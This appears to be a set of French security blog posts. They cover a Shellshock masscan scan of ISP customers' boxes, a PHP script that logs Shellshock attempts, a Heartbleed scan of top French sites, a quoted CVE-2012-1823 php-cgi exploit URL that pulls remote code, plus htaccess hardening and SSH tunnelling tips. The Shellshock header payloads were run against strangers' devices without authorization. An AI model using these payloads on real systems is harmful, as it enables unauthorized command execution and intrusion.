Shellshock http header

Vous êtes plusieurs à m'avoir demandé plus d'informations sur la faille Shellshock et l'impact qu'elle peut avoir sur des machines connectées à Internet.

Voici un bref test réalisé sur une plage d'IP /24 d'un DSLAM Free démontant que de nombreuses personnes connectées à Internet semblent être vulnérables à la faille Shellshock découverte récemment sur Bash par un français.

Le test démontré consiste à envoyer à un ensemble de machines/box connectées à Internet un paquet HTTP forgé avec des entêtes HTTP contenant une injection de commande. Toutes les machines vulnérables qui passeront les valeurs des entêtes HTTP sous forme de variables Bash exécuteront la commande indiquée dans la requête sans le vouloir.

Dans le cas présent, l'instruction transmise aux machines est de m'envoyer un Ping réseau. Toutes les machines vulnérables à Shellshock au travers de leur serveur Web obéiront à ma demande et m'enverront un Ping.

Cette attaque est totalement bénin pour les machines distantes, mais elle démontre qu'un grand nombre de machines/box connectées à Internet sont vulnérables à ce type d'attaque.


Soyez très vigilant, il est probable que d'ici les prochains jours des vers / trojans se déploient largement sur le réseau via l'utilisation de cette faille de sécurité importante.

php shellshock

Voici un petit script PHP permettant d'identifier rapidement des tentatives d'attaque Shellshok sur son serveur PHP.

Les attaques se trahissent par la présence des caractères '()' en début de chaîne d'entête HTTP.

<?php

// index.php  à la racine du serveur

function startsWith($haystack, $needle)
{
    return $needle === "" || strpos($haystack, $needle) === 0;
}

if ((startsWith($_SERVER['HTTP_COOKIE'],('()')))
||(startsWith($_SERVER['HTTP_REFERER'],('()')))
|| (startsWith($_SERVER['HTTP_HOST'],('()')))){
   
        // Tentative d'attaque logguée
        file_put_contents('attaques.log', $_SERVER['REMOTE_ADDR'].PHP_EOL,FILE_APPEND);
};

.....

Vous devriez voir le fichier "attaques.log" énormément grossir d'ici les prochains jours. La récente faille détectée dans Bash devrait avoir un impact non négligeable sur le trafic Internet. Des vers utilisant la vulnérabilité Shellshok devraient probablement circuler sur la toile d'ici les prochains jours .

Freebox Shellshock

Après être tombé sur un article intéressant sur l'exploitation à distance de la faille de sécurité "shellshock" trouvée récemment sur Bash par un Français. Je me suis amusé à tester les Freebox et autres boîtiers ADSL connectés à mon DSLAM, le résultat de mon test est assez intéressant inquiétant.

J'ai suivi l'astuce de Robert Graham sur l'utilisation de l'utilitaire masscan pour détecter les machines connectées à Internet vulnérables à la faille de sécurité "Shellshock.

J'ai donc compilé l'application masscan sur mon serveur avec le patch de Robert Graham permettant de modifier des entêtes HTTP.

$ sudo apt-get install git gcc make libpcap-dev
$ git clone https://github.com/robertdavidgraham/masscan
$ cd masscan/src/
$ rm proto-http.c
$ wget https://raw.githubusercontent.com/robertdavidgraham/masscan/master/src/proto-http.c
$ cd ..
$ make

J'ai repris le fichier de configuration de Robert Graham et je l'ai adapté la plage d'IP aux clients de Free connectés à mon DSLAM, l'histoire d'avoir une idée de la sensibilité des box de Free à cette nouvelle faille de sécurité qui secoue actuellement Internet.

target-ip = x.x.x.x/24
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 62.210.208.20
http-header[Host] = () { :; }; ping -c 3 62.210.208.20
http-header[Referer] = () { :; }; ping -c 3 62.210.208.20

Cette configuration de masscan injecte une commande shell dans les entêtes HTTP Cookie, Host et Referer. Si le serveur distant est vulnérable à la faille de sécurité "Shellshock" et que l'une des variables Cookie, Host et Referer est utilisée comme variable d'environnement lors de l'appel à un module CGI, un ping devrait automatiquement arriver sur mon serveur.

Je lance donc deux terminaux sur ma machine. Sur le premier terminal je lance un tcpdump pour afficher toutes les requêtes Ping entrantes et me permettre d'identifier toutes les machines vulnérables.

sudo tcpdump -v icmp

Sur le second terminal, je lance le masscan :

sudo ./masscan -c masscan.conf

Le résultat est assez surprenant, sur la plage d'IP de ma freebox chez Free, je découvre 15 Freebox Révolution allumées acceptant des requêtes sur le port 80. Mais heureusement, aucune d'entre elles ne me ping ... (c'est rassurant).

Cependant, ma machine reçoit 4 pings provenant de 4 box qui semblent être vulnérables à la faille "Shellshock" via l'injection de commandes shell par entêtes HTTP.

Les 4 box détectées ne répondent pas au ping et leurs ports semblent être filtrés (incorrectement si mes requêtes m'ont permis d'exécuter une commande shell sur ces box).

Je n'ai malheureusement pour le moment, aucune idée de quelle box il s'agit. Nmap ne m'a fourni aucune information exploitable ... D'après mes tests, les commandes shell transmises semblent être correctement interprétées par les box distantes, ce qui signifie qu'un cracker pourrait s'introduire sur votre réseau local ou avoir accès à l'ensemble des pages Web sur lesquels vous allez.

S'agit-il de la Freebox V5 ou de la Freebox Crystal ? Ou bien d'un NAS Synology connecté sur le port 80 de la Freebox ?


Update 29/09/2014 20h : Après des tests sur des Freebox V5, le problème ne semble pas se reproduire ... S'agirait-il des box Crystal ?

Update 29/09/2014 22h : Certaines machines localisées au niveau des NRA Free semblent être sensibles à ce type de vulnérabilité

22:55:41.809142 IP ras75-1-vxxx.intf.nra.proxad.net > xxxx.poneytelecom.eu: ICMP host 82.235.59.254 unreachable - admin prohibited filter, length 36

Update 29/09/2014 22h : Adresses IP des box transmises à Free pour analyse, je n'ai aucune idée de quelle version de box il peut s'agir. Sur chaque plage d'IP /24 de DLSAM on en retrouve entre 3 et 5 IP vulnérables

lock.jpg

La nouvelle faille SSL Heartbleed (CVE-2014-0160) qui fait trembler Internet depuis ces dernières heures semble toucher de nombreux sites Web sur la toile d'après les premiers articles publiés.

Cette faille peut permettre à un pirate de lire jusqu'à 64Ko de la RAM d'un serveur web distant sans aucune trace d'intrusion. Je vous laisse imaginer les informations auxquelles un attaquant pourrait avoir accès à distance et les conséquences associées.

Pour vérifier l'impact de cette faille sur les 500 plus gros sites Internet français , j'ai développé en quelques lignes un script en PHP qui extrait le top 500 des sites internet français du classement Alexa et qui les audite grâce à l'application Heartbleeder téléchargeable ici.

<?php

for ($i = 0; $i< 19 ;$i++){
$page = file_get_contents("http://www.alexa.com/topsites/countries;".$i."/FR");

preg_match_all('/<a href="\/siteinfo\/[\da-z\.-]+\.[a-z\.]{2,6}">(.*)<\/a>/i', $page, $matches);
foreach ($matches[1] as $match){
        echo "# ".$match;
        $result = exec("./heartbleeder $match");
        if (preg_match('/VULNERABLE/i',$result)){
                echo (' :: VULNERABLE');
        }
        echo "</br>";
}
}

?>

Voici le résultat de l'exécution de mon script cette nuit :

  1. Google.fr :: VULNERABLE
  2. Google.com :: VULNERABLE
  3. Facebook.com
  4. Youtube.com :: VULNERABLE
  5. Wikipedia.org :: VULNERABLE
  6. Yahoo.com :: VULNERABLE
  7. Leboncoin.fr
  8. Orange.fr
  9. Amazon.fr
  10. Live.com
  11. Free.fr
  12. Linkedin.com
  13. Twitter.com
  14. Lemonde.fr
  15. Lefigaro.fr
  16. Adcash.com
  17. Ebay.fr
  18. Tukif.com
  19. Commentcamarche.net
  20. Wordpress.com
  21. Tumblr.com :: VULNERABLE
  22. Allocine.fr
  23. Lequipe.fr
  24. Ad6media.fr
  25. Viadeo.com
  26. Linternaute.com
  27. Pagesjaunes.fr
  28. Sfr.fr
  29. Nouvelobs.com
  30. Akamaihd.net
  31. Jeuxvideo.com
  32. Programme-tv.net
  33. Leparisien.fr
  34. Xhamster.com :: VULNERABLE
  35. Dailymotion.com
  36. Cdiscount.com
  37. Over-blog.com
  38. Pinterest.com :: VULNERABLE
  39. Msn.com
  40. M2newmedia.com
  41. T.co
  42. Ovh.com
  43. 20minutes.fr
  44. Instagram.com :: VULNERABLE
  45. Pole-emploi.fr
  46. Microsoft.com
  47. Bing.com
  48. Lexpress.fr
  49. Priceminister.com
  50. Societe.com
  51. Apple.com
  52. Vube.com
  53. Stackoverflow.com :: VULNERABLE
  54. Paypal.com
  55. Voyages-sncf.com
  56. Journaldunet.com
  57. Xvideos.com
  58. Clkmon.com
  59. Credit-agricole.fr
  60. Livejasmin.com
  61. T411.me
  62. Aufeminin.com
  63. Ovh.net
  64. Fnac.com
  65. Deezer.com
  66. Vente-privee.com
  67. Boursorama.com
  68. Reverso.net
  69. Tf1.fr
  70. Ask.com
  71. Meteofrance.com
  72. Youporn.com
  73. Labanquepostale.fr
  74. Bfmtv.com
  75. Liberation.fr
  76. Laposte.net
  77. Pornhub.com
  78. Lesechos.fr
  79. Wordreference.com
  80. Amazon.com
  81. 01net.com :: VULNERABLE
  82. Outbrain.com :: VULNERABLE
  83. Seloger.com
  84. Lepoint.fr
  85. Adxcore.com :: VULNERABLE
  86. Gameforge.com
  87. Clubic.com
  88. Booking.com
  89. Huffingtonpost.fr
  90. Googleusercontent.com
  91. Doctissimo.fr
  92. Openclassrooms.com :: VULNERABLE
  93. Webrankinfo.com
  94. Dpstream.net :: VULNERABLE
  95. Prestashop.com :: VULNERABLE
  96. Bnpparibas.net
  97. Badoo.com :: VULNERABLE
  98. Vimeo.com
  99. Caisse-epargne.fr
  100. Zone-telechargement.com :: VULNERABLE
  101. Wikimedia.org :: VULNERABLE
  102. Wordpress.org :: VULNERABLE
  103. Canalblog.com
  104. Service-public.fr
  105. Societegenerale.fr
  106. Cpasbien.me :: VULNERABLE
  107. Francetvinfo.fr
  108. Imgur.com
  109. Canalplus.fr
  110. Rueducommerce.fr
  111. Caf.fr
  112. Canadaalltax.com
  113. Flickr.com :: VULNERABLE
  114. Vivastreet.com
  115. Banquepopulaire.fr
  116. Mysearchdial.com :: VULNERABLE
  117. Colissimo.fr
  118. Themeforest.net
  119. Developpez.net
  120. Eurosport.fr
  121. Neobux.com :: VULNERABLE
  122. Voila.fr
  123. Tripadvisor.fr
  124. Conduit.com
  125. Skyrock.com
  126. Redtube.com :: VULNERABLE
  127. Adobe.com
  128. Ouest-france.fr
  129. Aliexpress.com
  130. Leroymerlin.fr
  131. Admngronline.com
  132. Marmiton.org
  133. Yeslibertin.com :: VULNERABLE
  134. Paruvendu.fr
  135. Imdb.com
  136. Meetic.fr
  137. Europe1.fr :: VULNERABLE
  138. Laredoute.fr
  139. Google.co.uk :: VULNERABLE
  140. Ratp.fr
  141. Indeed.fr
  142. Lcl.fr
  143. Bouyguestelecom.fr
  144. Ebay.com
  145. Php.net :: VULNERABLE
  146. Kickass.to :: VULNERABLE
  147. Slideshare.net
  148. Hardware.fr
  149. 1and1.fr
  150. Forgeofempires.com
  151. Fotolia.com
  152. Reddit.com
  153. Thepiratebay.se
  154. Linguee.fr
  155. Xnxx.com
  156. Laposte.fr
  157. Blogspot.com :: VULNERABLE
  158. Potins.net
  159. Goodgamestudios.com
  160. Soundcloud.com
  161. Ikea.com
  162. Scoop.it :: VULNERABLE
  163. Zimbra.free.fr :: VULNERABLE
  164. Rtl.fr
  165. Lesnumeriques.com
  166. Castorama.fr :: VULNERABLE
  167. Ladepeche.fr
  168. Adopteunmec.com :: VULNERABLE
  169. Larousse.fr
  170. Apec.fr
  171. 1fichier.com :: VULNERABLE
  172. Interieur.gouv.fr
  173. Metronews.fr
  174. Journaldesfemmes.com
  175. Atlantico.fr
  176. Sourceforge.net
  177. Mappy.com
  178. Lacentrale.fr
  179. Mes-meilleurs-films.fr
  180. Mozilla.org
  181. Darty.com :: VULNERABLE
  182. Creditmutuel.fr
  183. Thefreecamsecret.com
  184. Amoureux.com
  185. Purepeople.com
  186. E-monsite.com :: VULNERABLE
  187. Deviantart.com
  188. Leguide.com
  189. Uptobox.com :: VULNERABLE
  190. Uploaded.net :: VULNERABLE
  191. Zanox.com
  192. Footmercato.net
  193. Sudouest.fr
  194. France3.fr
  195. Showroomprive.com
  196. Carrefour.fr
  197. Battle.net
  198. Alibaba.com
  199. Koramgame.com
  200. Ldlc.com
  201. Openadserving.com
  202. Semrush.com
  203. Bestusefuldownloads.com
  204. Tradedoubler.com
  205. Koreus.com :: VULNERABLE
  206. Adserverpub.com
  207. Wiktionary.org :: VULNERABLE
  208. Pap.fr
  209. Fdj.fr
  210. Minutebuzz.com
  211. Netvibes.com :: VULNERABLE
  212. Slate.fr :: VULNERABLE
  213. Egaliteetreconciliation.fr :: VULNERABLE
  214. Ameli.fr
  215. Awesomehp.com
  216. Cam4.fr
  217. Latribune.fr
  218. Github.io
  219. Jeanmarcmorandini.com
  220. 9gag.com :: VULNERABLE
  221. Twitch.tv
  222. Papystreaming.com
  223. Bp.blogspot.com
  224. Zalando.fr
  225. Scrutins.net
  226. Portail.free.fr
  227. Alsacreations.com
  228. You-will-date.com
  229. Journaldugeek.com
  230. Dropbox.com :: VULNERABLE
  231. Dl-protect.com :: VULNERABLE
  232. Tomsguide.fr
  233. Wikia.com :: VULNERABLE
  234. Mobile.free.fr
  235. Asos.fr
  236. Github.com :: VULNERABLE
  237. Groupon.fr
  238. Topito.com
  239. Airfrance.fr
  240. Onvasortir.com
  241. Frandroid.com
  242. Imp.free.fr
  243. Spi0n.com :: VULNERABLE
  244. Betclic.fr
  245. Files.wordpress.com
  246. Francetv.fr
  247. Tube8.com
  248. Ad2games.com :: VULNERABLE
  249. Telerama.fr
  250. Lavoixdunord.fr
  251. Frenchweb.fr
  252. Decathlon.fr
  253. Impots.gouv.fr
  254. Torrentz.eu :: VULNERABLE
  255. 3suisses.fr
  256. Voici.fr :: VULNERABLE
  257. Mediapart.fr
  258. Centerblog.net
  259. Materiel.net :: VULNERABLE
  260. Systweak.com
  261. Forumactif.com
  262. Hellocoton.fr
  263. Pcinpact.com
  264. Bbc.com
  265. Comprendrechoisir.com :: VULNERABLE
  266. Korben.info :: VULNERABLE
  267. Cic.fr
  268. Vpsdomain4.eu
  269. Archive.org :: VULNERABLE
  270. Premiere.fr :: VULNERABLE
  271. Themightyquest.com
  272. Zeobit.com :: VULNERABLE
  273. Snapdo.com
  274. Full-stream.net :: VULNERABLE
  275. Bbc.co.uk
  276. Aeriagames.com
  277. Shutterstock.com
  278. Onclickads.net
  279. Wix.com
  280. Legifrance.gouv.fr
  281. Millenium.org :: VULNERABLE
  282. Challenges.fr
  283. Chaturbate.com :: VULNERABLE
  284. Lachainemeteo.com
  285. Netaffiliation.com
  286. Amazonaws.com
  287. Arte.tv
  288. Gandi.net
  289. Logic-immo.com
  290. Wawa-mania.ec
  291. Adsl.free.fr
  292. Softonic.fr
  293. Vk.com
  294. Viamichelin.fr
  295. Jacquieetmicheltv.net
  296. Alittlemarket.com
  297. Trovigo.com
  298. Doublepimp.com
  299. W3schools.com
  300. Paris.fr :: VULNERABLE
  301. Gamekult.com
  302. Auchan.fr
  303. Covoiturage.fr :: VULNERABLE
  304. Boulanger.fr
  305. Forum-auto.com
  306. Mailchimp.com
  307. Iminent.com
  308. Urssaf.fr
  309. Pagesperso-orange.fr
  310. Gentside.com :: VULNERABLE
  311. Wannonce.com :: VULNERABLE
  312. Midilibre.fr
  313. Netechangisme.com
  314. Spartoo.com :: VULNERABLE
  315. Travelagency.travel
  316. Loading-delivery1.com
  317. Monster.fr
  318. Rapidgator.net
  319. Appround.us
  320. Doodle.com :: VULNERABLE
  321. Stackexchange.com :: VULNERABLE
  322. Coqnu.com
  323. Webmaster-rank.info
  324. Purevid.com
  325. Codecanyon.net
  326. Xcams.com
  327. Mediaplex.com
  328. Gameblog.fr
  329. Futura-sciences.com
  330. 6play.fr
  331. Megavod.fr
  332. Amazon.co.uk
  333. Ubuntu-fr.org
  334. Yelp.fr :: VULNERABLE
  335. Xe.com :: VULNERABLE
  336. Dailymail.co.uk
  337. Radins.com :: VULNERABLE
  338. Franceinfo.fr
  339. Bizpowa.com :: VULNERABLE
  340. Skype.com
  341. Kimsufi.com
  342. Letudiant.fr
  343. Feedly.com
  344. Grooveshark.com
  345. Fastdailyfind.com
  346. Aweber.com
  347. Speedanalysis.net
  348. Hootsuite.com
  349. Media.tumblr.com :: VULNERABLE
  350. Youjizz.com
  351. Directrev.com
  352. Domaintools.com
  353. Ask.fm
  354. Easyjet.com
  355. Abritel.fr
  356. Etsy.com
  357. Mmotraffic.com
  358. Pixmania.com
  359. France2.fr
  360. Cdn4711.net :: VULNERABLE
  361. Aol.com
  362. Programme.tv :: VULNERABLE
  363. Maxidivx.com
  364. Ebay.co.uk
  365. Cadremploi.fr
  366. M6.fr
  367. Maville.com
  368. Tuxboard.com
  369. Blogger.com :: VULNERABLE
  370. Theguardian.com
  371. Searchfun.in
  372. Jeu.info
  373. Demotivateur.fr
  374. Startertv.fr
  375. Presse-citron.net
  376. Opodo.co.uk
  377. Sarenza.com
  378. Megacinema.fr
  379. Leagueoflegends.com :: VULNERABLE
  380. Planet.fr
  381. Buzzfeed.com
  382. Wifi.free.fr
  383. Madmoizelle.com
  384. Ledauphine.com
  385. Easyvoyage.com
  386. Hm.com
  387. Wordpress-fr.net
  388. Addthis.com :: VULNERABLE
  389. Babylon.com
  390. Effiliation.com
  391. Google.es :: VULNERABLE
  392. Edreams.fr
  393. Openask.com :: VULNERABLE
  394. Adf.ly :: VULNERABLE
  395. Zdnet.fr
  396. Foozine.com :: VULNERABLE
  397. Delta-search.com
  398. Dealabs.com
  399. Konbini.com
  400. About.com
  401. Elle.fr :: VULNERABLE
  402. Cuisineaz.com
  403. Unblog.fr
  404. Wetransfer.com :: VULNERABLE
  405. Gizmodo.fr
  406. W3.org
  407. Europa.eu
  408. Conforama.fr
  409. Parisexe.com
  410. Downparadise.ws
  411. Routard.com
  412. Femmesdispo.com
  413. Brandalley.fr
  414. Majesticseo.com
  415. 22find.com
  416. Soonnight.com
  417. Beeg.com :: VULNERABLE
  418. Oxatis.com
  419. Mycanal.fr
  420. Macg.co
  421. Numericable.fr
  422. Generation-nt.com
  423. Steampowered.com
  424. Frenchtorrentdb.com
  425. Turbobit.net :: VULNERABLE
  426. Homelidays.com
  427. Dailygeekshow.com
  428. Newhdplugin.net
  429. Lesinrocks.com
  430. Microsoftonline.com
  431. Yac.mx
  432. Sofoot.com
  433. Jeuxonline.info
  434. Ranks.fr :: VULNERABLE
  435. Twenga.fr
  436. Numerama.com
  437. Hardsextube.com
  438. Gtmetrix.com
  439. Insee.fr
  440. Maxifoot.fr
  441. Universfreebox.com
  442. Mondialrelay.fr
  443. Jacquieetmicheltv2.net
  444. Pubeco.fr
  445. Abondance.com
  446. Viedemerde.fr :: VULNERABLE
  447. Sports.fr :: VULNERABLE
  448. Ozap.com
  449. Motherless.com :: VULNERABLE
  450. Ma-reduc.com
  451. Fnacspectacles.com
  452. Jimdo.com
  453. Cloudfront.net
  454. Prizee.com
  455. Caradisiac.com
  456. Westernunion.fr
  457. Bwin.fr
  458. Education.gouv.fr
  459. Pmu.fr
  460. Online.net
  461. Forumconstruire.com
  462. 750g.com
  463. Letribunaldunet.fr
  464. Huffingtonpost.com
  465. Publicidees.com
  466. Vide-greniers.org :: VULNERABLE
  467. Cnn.com
  468. Airbnb.fr :: VULNERABLE
  469. Joomla.fr :: VULNERABLE
  470. Hsbc.fr
  471. Xlovecam.com
  472. Cloudify.cc
  473. Z5x.net
  474. Qadabra.com
  475. Duckduckgo.com :: VULNERABLE

Sur les 500 plus gros sites français 97 sont aujourd'hui vulnérables à cette faille SSL.

Le parlement européen travaille actuellement sur l'amélioration de la sécurité de votre vie privée.

Ceci en proposant notamment de nouvelles lois interdisant l'utilisation de conditions d'utilisation abusives ou imprécises sur Internet.

Nombreux sont les sites Internet utilisant des termes et conditions d'utilisation allant à l'encontre de la vie privée de ses utilisateurs. Aujourd'hui ces sites vivent grâce à la négligence des utilisateurs qui ne prennent pas le temps de lire ces conditions d'utilisation barbares, souvent vagues, qui de plus sont amenées à changer à tout moment sans que l'utilisateur en soit correctement informé.

Une fois inscrit sur ces plateformes, il est souvent impossible de récupérer et de supprimer ses données personnelles. Les utilisateurs se retrouvent bloqués face à des services sans scrupule.

Dans d'autres cas ce sont vos données personnelles qui sont revendues à d'autres sociétés sans vous en soyez informé. Vos données sont ensuite utilisées pour du mailing ou du ciblage publicitaire ...

Aujourd'hui, les conditions d'utilisation des services sont surveillées par quelques passionnés non rémunérés. Chaque faux pas des sociétés sur les conditions d'utilisation peut créer des mouvements de foules non maîtrisés.

Il y a une règle à prendre en compte à l'heure d'aujourd'hui sur Internet :

"Quand un produit sur Internet est gratuit d'utilisation, cela signifie que c'est vous le produit."



Article sponsorisé par BeOn

php_logo.jpg

Une importante faille PHP semble occuper de nombreux robots et script kiddies.

Cette faille permet d'exécuter du code PHP à distance et de prendre la main sur un serveur Web très facilement. Voici l'URL que l'attaquant utilise pour détecter si votre serveur est vulnérable :

http://www.monserveur.com/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt

Cette URL est sollicité de nombreuses fois par jour sur mon serveur, je pense que de nombreux serveurs ont été infectés ;-(

En cas de vulnérabilité de votre serveur, l'appel de cette URL permet d'exécuter sur votre serveur du code PHP provenant d'un serveur Thailandais : http://61.19.253.26/echo.txt

<?php echo "dsfer34w5rlsidfosdedfpsd"; ?>

La faille a été découverte mi-mai touche heureusement que les serveurs avec PHP fonctionnant en mode CGI ou l'exécutable PHP est exécuté lors de la requête HTTP. Les serveurs utilisant des pool de CGI PHP de type Fast-cgi ou le mod_php classique d'Apache sont épargnés à ce type d'attaque.

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.

http://www.cvedetails.com/cve/CVE-2012-1823

Je vous invite à vérifier dès maintenant la version de votre installation PHP ;-)

cybercriminalite-europe.jpg

Vous ne savez pas comment expliquer la cybercriminalité à vos parents. La notion de botnet, spyware, trojan leur est totalement opaque ?
Voici une vidéo financée par la Commission Européenne qui a comme objectif de sensibiliser les personnes sur la sécurité informatique et sur le fait que toute personne connectée sur la toile est potentiellement vulnérable.

L'autre message important porté par la vidéo concerne les accords entre les pays et les sociétés que la Commission Européenne met en place afin d'enrayer le développement des botnets sur les réseaux et de limiter la cybercriminalité.

La vidéo est simple, efficace, compréhensible par Mr et Mme tout le monde. Pour vous les geeks, j'imagine que les messages vous parlent et que PF et Iptables sont votre leitmotiv ;-)



(Voir la vidéo si celle-ci ne s'affiche pas)

Me concernant, je me suis fait piraté deux fois malgré la sensibilité que je porte pour la sécurité informatique. Ces deux piratages sont seulement ceux que j'ai découverts, j'imagine que potentiellement d'autres personnes / robots ont eu leurs heures de gloire sur mes machines.

Je me suis fait piraté mon serveur Linux en 2005, j'ai décrit à ce sujet un récit très complet allant jusqu'au tracking des pirates sur un réseau IRC.

Depuis cette époque d’insouciance, mon NAS s'est fait piraté une fois, j'ai évité le pire avec une autre faille de sécurité que j'ai découverte dans le formulaire d'authentification du NAS.

Bref, être sensible à la sécurité n'est pas suffisant, il faut savoir se protéger. Heureusement, nos Box ADSL possèdent de très bons firewalls qui limitent les casses. A l'époque des modems RTC, 80% des personnes connectées étaient facilement vulnérables.

Sortez sur le Web couvert !


Article sponsorisé par BeOn

lock-security.jpg

Par défaut les systèmes de blog possèdent tous un mécanisme d'authentification applicatif permettant de protéger "normalement" toutes les ressources se trouvant dans la zone d'administration du site.

Cependant, il arrive parfois que des failles applicatives soient détectées et permettent à des personnes tierces mal intentionnées de pouvoir exécuter des tâches d'administration sans en avoir les autorisations.

Il y a une astuce très simple qui permet d'augmenter la sécurité d'un blog, cette astuce consiste tout simplement à placer un second mécanisme d'authentification de type Basic HTTP password en entrant sur la zone d'administration.

Ex : http://www.geeek.org/admin/

Cela se fait très simplement sur Apache et sur l'ensemble des autres serveurs Web.
Sur Apache, il suffit de placer un fichier .htaccess dans le répertoire "admin" de votre blog et de définir une politique d'authentification.

AuthType Basic
AuthName "Blog admin"
AuthUserFile /path/to/.htpasswd
Require valid-user

Pour vous aider à générer ce fichier, il existe des outils en ligne.

Après cette petite opération, tous les accès au répertoire d'administration du blog seront filtrés directement par le serveur Web. Les possibles vulnérabilités seront alors hors de portées.
Une autre solution efficace consiste à renommer le répertoire d'administration afin de la rendre non prédictible et limiter les attaques provenant de robots.

Enfin, si vous êtes encore plus paranoïaque que moi, vous pouvez aussi restreindre l'adresse IP ayant accès à la zone d'administration et déporter le contenu du fichier .htaccess directement dans la configuration du serveur Apache si vous en avez les droits.

AuthType Basic
AuthName "Blog admin"
AuthUserFile /path/to/.htpasswd
Require valid-user

Order Deny,Allow
Allow from 11.111.11.111
Deny from all

Satisfy any

Pour terminer, si vous souhaitez bloquer définitivement les tentatives de bruteforce, vous pouvez configurer Fail2ban pour qu'il agisse dynamiquement sur l'IPtables de votre serveur au bout de 5 tentatives d'authentification infructueuses par exemple. Pour cela vous pouvez aller jeter un oeil sur l'article Fail2ban dédié à Apache :

http://www.fail2ban.org/wiki/index.php/Apache

Vous avez désormais tous les outils entre les mains pour surprotéger la zone d'administration de votre blog.
Et vous ? Qu'utilisez-vous pour sécuriser les accès à l'administration votre site Web ?


Crédits photo : Subcircle

Voici une astuce toute bête pour surfer de manière sécurisée et non limitée depuis un PC ayant des restrictions d'accès au HTTP (port 80).

ssh-tunnel-http-proxy.png

C'est le cas sur certains hotspots publics, le port 80 est souvent filtré et ne fonctionne qu'après une authentification depuis un portail captif.

L'astuce consiste à utiliser un tunnel SSH pour faire transiter tout son trafic HTTP vers une machine sur Internet n'ayant aucune limitation.

Cela fonctionne seulement si le flux SSH sortant est autorisé depuis le lieu où vous vous connectez.
Il vous faut préalablement un serveur Linux accessible depuis Internet avec un serveur SSH d'activé.

La première étape consiste à installer un proxy HTTP sur la machine Linux qui va servir de relais. Vous pouvez utiliser pour cela Tinyproxy, il est léger et très simple à configurer.

apt-get install tinyproxy

Par défaut, le proxy HTTP démarre sur le port 8888.

/etc/init.d/tinyproxy start

Ensuite, il vous suffit de créer un tunnel SSH avec Putty par exemple. Reprenez les informations suivantes :

putty.jpg

Le tunnel ouvre un port 8080 local et redirige tout sur le port 8888 du "localhost" du serveur distant.

Il ne vous reste plus à configurer un proxy sur votre PC depuis les paramètres de votre navigateur.

proxy-http.jpg

Et vous voilà libre de surfer en toute liberté, tout votre flux HTTP / DNS transite via le serveur distant.
Le hotspot ne voit plus aucune de vos requêtes HTTP et les personnes sniffant le réseau Wifi non plus. Cette solution est une alternative simple aux solutions de VPN plus lourdes à mettre en oeuvre.

Update : Seconde solution encore plus simple

La seconde solution proposée par Seb et qui évite l'installation d'un proxy HTTP consiste à créer un tunnel SSH dynamique.

putty-dynamic-ssh-tunnel.jpg

Et à déclarer le tunnel comme un proxy Sock depuis les paramètres avancés de configuration du proxy de votre navigateur :

proxy-sock.jpg

Cette solution plus simple et évite de devoir installer un proxy HTTP sur le serveur intermédiaire.

Merci Seb pour cette astuce ;-)

Les idées toutes simples sont parfois les meilleures en termes de sécurité. Voici trois astuces pour augmenter la sécurité de votre carte bancaire.

credit-card-securite.jpg

  1. Remplacez votre signature par un "Check for ID". En cas de vol de votre carte, la signature est normalement vérifiée sur des paiements à l'étranger. En plaçant "Check for ID", cela devrait restreindre l'idée à un voleur d'imiter votre signature, car il ne la connait pas.
  2. Grattez avec un cutter le code CVV2 de votre carte afin d'éviter qu'un commerçant ne s'amuse à copier la totalité de vos informations bancaires dans votre dos. Même si ce code est calculable, d'après quelques recherches réalisées sur Internet, cela devrait dissuader pas mal de fraudeurs.
  3. Enfin, payez sur Internet avec des e-cartes bleues virtuelles, Paypal, Kwixo et S-money ..

Voyez-vous d'autres astuces ? :-)